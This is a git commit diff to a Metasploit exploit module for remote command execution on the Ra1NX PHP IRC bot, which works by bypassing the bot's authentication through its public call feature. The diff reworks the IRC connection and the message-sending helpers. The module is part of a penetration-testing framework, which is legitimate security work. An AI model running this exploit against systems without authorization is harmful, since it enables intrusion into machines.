Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall
commit
21ea1c9ed4
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => '"Ra1NX" PHP Bot PubCall Authentication Bypass Remote Code Execution',
|
'Name' => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module allows remote command execution on the PHP IRC bot Ra1NX by
|
This module allows remote command execution on the PHP IRC bot Ra1NX by
|
||||||
using the public call feature in private message to covertly bypass the
|
using the public call feature in private message to covertly bypass the
|
||||||
|
@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
['OSVDB', '91663'],
|
||||||
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
|
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
|
||||||
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
|
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
|
||||||
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
|
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
|
||||||
|
@ -40,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'DisableNops' => true,
|
'DisableNops' => true,
|
||||||
'Compat' =>
|
'Compat' =>
|
||||||
{
|
{
|
||||||
'PayloadType' => 'cmd',
|
'PayloadType' => 'cmd'
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
@ -62,16 +63,38 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def connect_irc
|
||||||
|
print_status("#{rhost}:#{rport} - Connecting to IRC server...")
|
||||||
connect
|
connect
|
||||||
|
|
||||||
|
data = ""
|
||||||
|
begin
|
||||||
|
read_data = sock.get_once(-1, 1)
|
||||||
|
while not read_data.nil?
|
||||||
|
data << read_data
|
||||||
|
read_data = sock.get_once(-1, 1)
|
||||||
|
end
|
||||||
|
rescue EOFError
|
||||||
|
end
|
||||||
|
|
||||||
|
if data and data =~ /020.*wait/
|
||||||
|
print_status("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")
|
||||||
|
select(nil, nil, nil, 3)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
connect_irc
|
||||||
|
|
||||||
response = register(sock)
|
response = register(sock)
|
||||||
if response =~ /463/ or response =~ /464/
|
if response =~ /463/ or response =~ /464/
|
||||||
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
|
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
confirm_string = rand_text_alpha(8)
|
confirm_string = rand_text_alpha(8)
|
||||||
response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n", ":#{datastore['RNICK']}")
|
response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
|
||||||
|
|
||||||
quit(sock)
|
quit(sock)
|
||||||
disconnect
|
disconnect
|
||||||
|
|
||||||
|
@ -82,22 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def send_msg(sock, data, startResponse = nil)
|
def send_msg(sock, data)
|
||||||
sock.put(data)
|
sock.put(data)
|
||||||
data = ""
|
data = ""
|
||||||
count = 3
|
|
||||||
begin
|
|
||||||
begin
|
begin
|
||||||
read_data = sock.get_once(-1, 1)
|
read_data = sock.get_once(-1, 1)
|
||||||
while not read_data.nil?
|
while not read_data.nil?
|
||||||
data << read_data
|
data << read_data
|
||||||
read_data = sock.get_once(-1, 1)
|
read_data = sock.get_once(-1, 1)
|
||||||
end
|
end
|
||||||
if startResponse != nil and data.start_with?(startResponse)
|
|
||||||
startResponse = nil
|
|
||||||
end
|
|
||||||
count -= 1
|
|
||||||
end while startResponse == nil and count != 0
|
|
||||||
rescue EOFError
|
rescue EOFError
|
||||||
end
|
end
|
||||||
data
|
data
|
||||||
|
@ -137,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect_irc
|
||||||
|
|
||||||
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
|
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
|
||||||
response = register(sock)
|
response = register(sock)
|
||||||
|
|
Loading…
Reference in New Issue